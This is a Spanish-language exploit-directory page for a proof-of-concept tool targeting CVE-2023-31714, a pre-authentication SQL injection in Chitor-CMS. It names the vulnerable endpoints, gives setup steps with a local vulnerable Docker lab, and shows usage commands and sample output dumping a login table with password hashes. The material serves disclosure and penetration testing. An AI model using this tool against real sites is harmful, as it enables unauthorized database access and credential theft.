Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-31714 — Exploit de prueba de concepto para CVE-2023-31714, una inyección SQL de pre-autenticación en Chitor-CMS < 1.1.2. Automatiza la enumeración de bases de datos y el volcado de credenciales a través del endpoint /edit_school.php. | Kitploit
Herramientas/GitHubGitHub/msd0pe-1/cve-2023-31714
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de Bases de Datos
GitHubmsd0pe-1/cve-2023-31714

CVE-2023-31714

Exploit de prueba de concepto para CVE-2023-31714, una inyección SQL de pre-autenticación en Chitor-CMS < 1.1.2. Automatiza la enumeración de bases de datos y el volcado de credenciales a través del endpoint /edit_school.php.

Ver Repositorio
18hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-31714 - Chitor-CMS < 1.1.2 Inyección SQL Pre-Auth

Descubierto por msd0pe
https://github.com/waqaskanju/Chitor-CMS
Proyecto de waqaskanju

chitor1.1.py (Parcheado desde el commit 69d3442)

2023/04/13
Se encontró una inyección SQL en el endpoint /edit_school.php?id= y no requiere autenticación.

chitor1.0.py (Se convirtió en una inyección SQL post-autenticación desde el commit 5f76192)

2023/04/09
Se encontraron inyecciones SQL en múltiples endpoints como /add_school_class.php?school= y no requieren autenticación. Desde el commit 5f76192, estos endpoints verifican que el usuario conectado tenga derechos de edición. Esta comprobación ya existía antes, pero no era funcional.

Instalación

sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/cve-2023-31714
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable

TO START THE VULNERABLE DOCKER:
  - sudo ./run.sh [1.0|1.1]
TO STOP AND CLEAN THE DOCKER:
  - sudo ./clean.sh

Uso

Usage: python chitor1.1.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -u URL, --url=URL     target url
  --dbs                 list databases
  -D DATABASE, --db=DATABASE
                        select a database
  --tables              list tables
  -T TABLE, --table=TABLE
                        select a table
  --dump                dump the content

  Examples:
    python3 chitor1.1.py -u http://127.0.0.1 --dbs
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump

  Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.
  Source code put in public domain by msd0pe,no Copyright
  Any malicious or illegal activity may be punishable by law
  Use at your own risk

Ejemplo

python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name  |             Password             | Status |
+----+-------------+------------+----------------------------------+--------+
| 1  |      1      |   Guest    | adb831a7fdd83dd1e2a309ce7591dff8 |   1    |
| 2  |      2      | waqaskanju | ################################ |   1    |
| 3  |      3      |   admin    | 21232f297a57a5a743894a0e4a801fc3 |   1    |
+----+-------------+------------+----------------------------------+--------+
Descargar herramienta